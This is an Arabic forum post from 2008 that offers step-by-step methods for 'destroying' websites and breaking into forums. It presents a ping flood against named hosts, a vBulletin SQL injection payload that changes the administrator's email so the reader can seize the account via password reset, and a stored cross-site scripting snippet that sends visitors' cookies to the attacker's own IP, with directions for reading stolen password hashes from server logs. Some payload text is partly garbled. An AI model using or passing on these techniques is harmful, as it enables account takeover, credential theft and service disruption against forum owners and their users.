منتديات أبسألك

abs2lk..?
 
الرئيسيةس .و .جبحـثالأعضاءالمجموعاتدخولالتسجيل

شاطر | 
 

 طريقة من طرق تدمير المواقع و المنتديات

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
فواز العنزي
Admin
Admin
avatar

ذكر
عدد الرسائل : 386
العمر : 33
العمل/الترفيه : الكمبيوتر
المزاج : شاعر و كلي مشاعر
تاريخ التسجيل : 07/04/2008

مُساهمةموضوع: طريقة من طرق تدمير المواقع و المنتديات   الخميس أبريل 24, 2008 1:57 pm




طريقة من طرق تدمير المواقع

من برنامج الدوز حط الامر هذا

ping http://zzzzzzzzt مثال1

بدل الأكسات اكتب اسم الموقع

ping http://www.EXR.com مثال2
--------------------------------------------
طريقة من طرق تدمير المواقع بلايبي

من قائمة ابدء اختار تشغيل وحط الامر التالي

ping الايبي -ttt مثال1

ping 202.99.166.34 -ttt مثال2






طريقه لاختراق المنتديات
السلام عليكم ورحمه الله وبركاته

طريقة اختراق المنتديات ((( سهل جدا )))
هذه طريقة سهلة لاختراق المنتديات
.
1. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :

URL = العنوان المستضيف للمنتدى
مثل = israel.org
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
\");".$users=$DB_site->query("update+user+set+email='YOUR@EMAIL.HERE'+WHERE+username ='ADMIN'")."
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password

9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

والحين ماشاء الله عليك صاير مدير>>>> الدجه


قبل كل شي اذا جيت تد خل على موجة الدوس لا زم تكتب في مفتا ح التشغيل ها الا مر > command
طريقة الحصول على رقم الا ي بي تبع الموقع : تكتب الا مر هذا ....
ping_www.tash2003.com بس يطلع لك الا ي بي تبع الموقع بين قوصين .


======================================
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin
======================================
بسم الله الرحمن الرحيم ..

يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...

---------
مقدمة :
---------

الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .


----------
الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
script>document.write('src="http://my_ip_address/'+****************+'">';
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb


جميع الحقوق محفوظة الى شبكة حنين haneen.net.eg

_________________
فواز العنزي
الشاعر أبو ثامر
k.zz.k@hotmail.com
fm.3@msn.com
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
طريقة من طرق تدمير المواقع و المنتديات
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات أبسألك :: البرامج والكمبيوتر-
انتقل الى: